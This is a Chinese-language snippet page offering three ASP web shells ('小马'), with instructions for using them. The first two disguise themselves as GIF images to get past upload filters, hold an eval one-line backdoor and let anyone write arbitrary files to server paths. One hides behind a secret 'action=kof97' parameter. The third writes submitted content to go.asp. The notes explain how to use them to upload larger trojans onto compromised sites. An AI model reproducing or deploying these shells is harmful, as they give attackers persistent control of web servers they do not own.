第一款:
復(fù)制代碼 代碼如下:
GIF89a$ ;<hTml>
<%eval request(chr(1))%>
<%
on error resume next
testfile=Request.form("filepath")
msg=Request.form("message")
if Trim(request("filepath"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&msg& "")
if err =0 Then
response.write "<font color=red>ok</font>"
else
response.write "<font color=red>no</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<form method="POST" ACTION="">
<input type="text" size="20" name="filepath"
value="<%=server.mappath("go.asp")%>"> <BR>
<TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA>
<input type="submit" name="Send" value="go">
</form></body></html></body></html>
第二款:
復(fù)制代碼 代碼如下:
GIF89a$ ;<hTml>
<%eval request(chr(1))%>
<% if request("action")="kof97" then %>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<% end if %>
</body></html>
第三款:
復(fù)制代碼 代碼如下:
<%set s=server.createObject("Adodb.Stream")%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet="gb2312"%>
<%s.writetext request("d")%>
<%s.SaveToFile server.mappath("go.asp"),2%>
<%s.Close%>
<%set s=nothing%>
<form>
<textarea name=d cols=80 rows=10 width=32></textarea>
<input type=submit>
</form>
使用說明及介紹:
第一款 功能說明: 用一句話連接進(jìn)行傳馬 或直接傳馬
GIF89a$ ;<hTml>
--[這里的意思相信大家都了解 意思就是 上傳圖片時(shí)起到欺騙的作用.]
<%eval request(chr(1))%>
--[這是就asp一句話木馬 這里的 chr(1) 就是asp一句話木馬的密碼
那么實(shí)際chr(1)= 所以密碼為 別說你不知知道
重點(diǎn)來了 當(dāng)你用這個(gè)ASP小馬時(shí) 你可以用這個(gè)asp小馬來里面的一句話進(jìn)行傳大馬 然也可以直接用這個(gè)傳大馬
這里的go.asp就是上傳馬的地址了 這個(gè)自己可以修改 說的夠詳細(xì)吧
第二款:
同上功能就不說了!
<% if request("action")="kof97" then %>
相信懂ASP的一看就明白! 也不多說了
用法是 直接在你小馬地址后面加上 ?action=kof97 給個(gè)例子吧
http://www.xxx.com/xxx.asp?action=kof97 kof97這個(gè)改成自己的!在小馬里面改
好處就是 當(dāng)別人直接訪問你的小馬時(shí) 顯示的是空白 無法使用你的小馬 與要密碼的小馬差不多
第三款:
可以說是除了ASP一句話小馬之外就非它莫屬了! 只有兩百多個(gè)字節(jié)
<%s.SaveToFile server.mappath("go.asp"),2%>
當(dāng)你打開小馬地址就會(huì)自動(dòng)生成go.asp 修改成自己的
此小馬要與 一句話小馬 或其它小馬 配合使用 當(dāng)你在在輸入框?qū)懭胛覀兊鸟R 然后點(diǎn) 提交 會(huì)自動(dòng)生成go.asp 小馬地址
好處就是 當(dāng)別人直接訪問你的小馬時(shí) 不管他提交什么馬 他不知道你設(shè)置的那個(gè)文件地址